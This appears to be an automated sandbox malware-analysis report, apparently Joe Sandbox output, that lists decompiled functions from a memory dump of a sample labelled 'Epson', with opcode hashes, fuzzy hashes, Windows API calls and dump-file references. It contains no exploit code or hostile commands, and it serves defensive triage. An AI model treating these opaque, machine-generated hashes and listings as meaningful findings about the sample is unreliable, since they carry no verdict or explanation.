                                                                                                                                                                                                                                      • Opcode ID: 7fb0e9969a7f2536a4c115e58f4ec69a32fc8229a0f22e4889137eaac596d78b
                                                                                                                                                                                                                                      • Instruction ID: 2463f4ff10b45ac9f7035b478a3301ec69028b316748766bc1dfdfb499a6ec14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fb0e9969a7f2536a4c115e58f4ec69a32fc8229a0f22e4889137eaac596d78b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651F632E081169BCB14DFA8C9509BEB3A2BF15760B68422BE866E7384D775DD40F790
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 00FD41D1
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00FD41DC
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00FF0B44,?), ref: 00FD4236
                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 00FD42A9
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00FD4341
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00FD4393
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                      • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                      • Opcode ID: a1f408e88d77a3e54b9599537c1d613ff2e0b3bdc332aed43d36abbd4830277f
                                                                                                                                                                                                                                      • Instruction ID: 63ce8e2c8ff9672d6a5fa4a98b15bd37403281287b2e33f988791e5bed0e2f0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1f408e88d77a3e54b9599537c1d613ff2e0b3bdc332aed43d36abbd4830277f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6161AE716083019FD311DF68C889B6ABBE6EF49715F08090AF9859B391C774FD48EB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00FC8C9C
                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00FC8CAC
                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FC8CB8
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC8D55
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8D69
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8D9B
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FC8DD1
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8DDA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                      • Opcode ID: e5ce85591fdd428f85dfacc19994fdb05e3f0582eeefa9d0ce37f3ee31f67743
                                                                                                                                                                                                                                      • Instruction ID: e21757e7c046f67959ac89f593813a21436e9ce95a58e3c8f30be6dedfe53bab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5ce85591fdd428f85dfacc19994fdb05e3f0582eeefa9d0ce37f3ee31f67743
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6615E725043069FC710EF60C945E9EB7E8FF99350F04481EF98A87251DB35E949DB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateMenu.USER32 ref: 00FE4715
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00FE4724
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FE47AC
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00FE47C0
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00FE47CA
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00FE47F7
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00FE47FF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                                                                                      • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                      • Opcode ID: 65f7339bf84ce6d5615c7bf20e7eb7d8288610e9428badb044c4c7a66aa65f28
                                                                                                                                                                                                                                      • Instruction ID: ec76ecd9778f74301964c807c848fd9dcc7d55e0c1393b85dfc3a329c6f27fc3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65f7339bf84ce6d5615c7bf20e7eb7d8288610e9428badb044c4c7a66aa65f28
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25418A75A01389AFDB24DF65D884AAA7BB6FF09314F14402DEA459B390C771AD10EF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00FB28B1
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00FB28BC
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00FB28D8
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FB28DB
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00FB28E4
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00FB28F8
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FB28FB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 84e333802de8309ad62c6d57c7bf933a29423c00f8c3cd2d9e50501d7772e782
                                                                                                                                                                                                                                      • Instruction ID: eecc32e960ace51785948205b1af3f4b82ee27d1a733befc33381adafc6fab24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84e333802de8309ad62c6d57c7bf933a29423c00f8c3cd2d9e50501d7772e782
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4621A475D00118BBCF11AFA1CC85EEEBBB4EF06350F004156B951AB291DB799809FF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00F5B329: _wcslen.LIBCMT ref: 00F5B333
                                                                                                                                                                                                                                        • Part of subcall function 00FB45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00FB4620
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00FB2990
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32 ref: 00FB299B
                                                                                                                                                                                                                                      • GetParent.USER32 ref: 00FB29B7
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FB29BA
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00FB29C3
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00FB29D7
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FB29DA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                      • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                      • Opcode ID: 8516cad4772c4ae07045875507f75412921bafaf640ea6a0452693405ad6e8f2
                                                                                                                                                                                                                                      • Instruction ID: 480bf668423de27b384cffb224015c5d8665d1c5caba9d8896db25c633b1019d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8516cad4772c4ae07045875507f75412921bafaf640ea6a0452693405ad6e8f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A121C0B5D00118BBCF11ABA1CC85EFEBBB8EF05350F004016B955AB2A1DB799849FF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00FE4539
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00FE453C
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE4563
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FE4586
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00FE45FE
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00FE4648
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00FE4663
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00FE467E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00FE4692
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00FE46AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                                                                                      • Opcode ID: 5781d6ec09b7b197f4fcbad670a30547a6b01fa53db86c9ee1c1964128ffbc24
                                                                                                                                                                                                                                      • Instruction ID: 55521f78f1c147b63e729c30ea677eae3799a1dfb003e063c3e55ecfb21ab8d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5781d6ec09b7b197f4fcbad670a30547a6b01fa53db86c9ee1c1964128ffbc24
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24618C75A00248AFDB21DFA4CC81EEEB7B8EF09710F100159FA15EB2A1C774AD56EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00FBBB18
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBB2C
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00FBBB33
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBB42
                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBBB54
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBB6D
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBB7F
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBBC4
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBBD9
                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00FBABA8,?,00000001), ref: 00FBBBE4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2156557900-0
                                                                                                                                                                                                                                      • Opcode ID: 37c159ccae868640c6b735bfd5b69ad92c9b615da86c0399e7343460f0fbb5a5
                                                                                                                                                                                                                                      • Instruction ID: 8621cda8944e442c3cca628f3edc329685bdf4f5aad4a24ffed681fbe100c4ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37c159ccae868640c6b735bfd5b69ad92c9b615da86c0399e7343460f0fbb5a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD316172904208AFDB30DF15DCC8FA977A9EB84322F208419F905DB198D7F9D980AF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83007
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4), ref: 00F82D4E
                                                                                                                                                                                                                                        • Part of subcall function 00F82D38: GetLastError.KERNEL32(01021DC4,?,00F8DB51,01021DC4,00000000,01021DC4,00000000,?,00F8DB78,01021DC4,00000007,01021DC4,?,00F8DF75,01021DC4,01021DC4), ref: 00F82D60
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83013
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8301E
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83029
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83034
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8303F
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8304A
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83055
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F83060
                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00F8306E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                                                                      • Opcode ID: dbbf9d19648d0b17907b1126d96db95cfde33e6693509d6a34e8871eb1de7d7e
                                                                                                                                                                                                                                      • Instruction ID: f4b9961778aa022811f2929824b25a2bd429241283f8c38e251d70f623b2e0ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbbf9d19648d0b17907b1126d96db95cfde33e6693509d6a34e8871eb1de7d7e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5117476500108AFCB81FF94CC86DDD7FA5EF05350B9185A5FA089B232EA35EA51AB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F52AF9
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00F52B98
                                                                                                                                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00F52D7D
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F93A1B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00F93A80
                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F93AAD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                                                                                      • String ID: close all
                                                                                                                                                                                                                                      • API String ID: 469580280-3243417748
                                                                                                                                                                                                                                      • Opcode ID: 950a9e78b26083085544c1630670c46cdbc499c133d09404568ad2d34fee0ada
                                                                                                                                                                                                                                      • Instruction ID: 6829b0fff0e6b5829ad77c44141626f8c9304546a09bd506f180c0fc9d10b728
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 950a9e78b26083085544c1630670c46cdbc499c133d09404568ad2d34fee0ada
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78D18F31B01212DFDB69EF14C885B29F7B0BF45721F1142ADE94A6B262CB35AD16EF40
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FC89F2
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8A06
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00FC8A30
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00FC8A4A
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8A5C
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00FC8AA5
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FC8AF5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                      • API String ID: 769691225-438819550
                                                                                                                                                                                                                                      • Opcode ID: 54ab4d0595c8be68b77fa532a7f96983da9f046c6568ba1fc39c4a7d73728077
                                                                                                                                                                                                                                      • Instruction ID: 3e02bbf7cd77859bc2eddf33ec61915907e8a9580cdd7407744345d0dde6021f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54ab4d0595c8be68b77fa532a7f96983da9f046c6568ba1fc39c4a7d73728077
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B881B1729042069BCB24EF14C946FBAB3E8BF847A0F54481EF885D7250DB38D946AB52
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00F574D7
                                                                                                                                                                                                                                        • Part of subcall function 00F57567: GetClientRect.USER32(?,?), ref: 00F5758D
                                                                                                                                                                                                                                        • Part of subcall function 00F57567: GetWindowRect.USER32(?,?), ref: 00F575CE
                                                                                                                                                                                                                                        • Part of subcall function 00F57567: ScreenToClient.USER32(?,?), ref: 00F575F6
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 00F96083
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F96096
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F960A4
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00F960B9
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00F960C1
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F96152
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
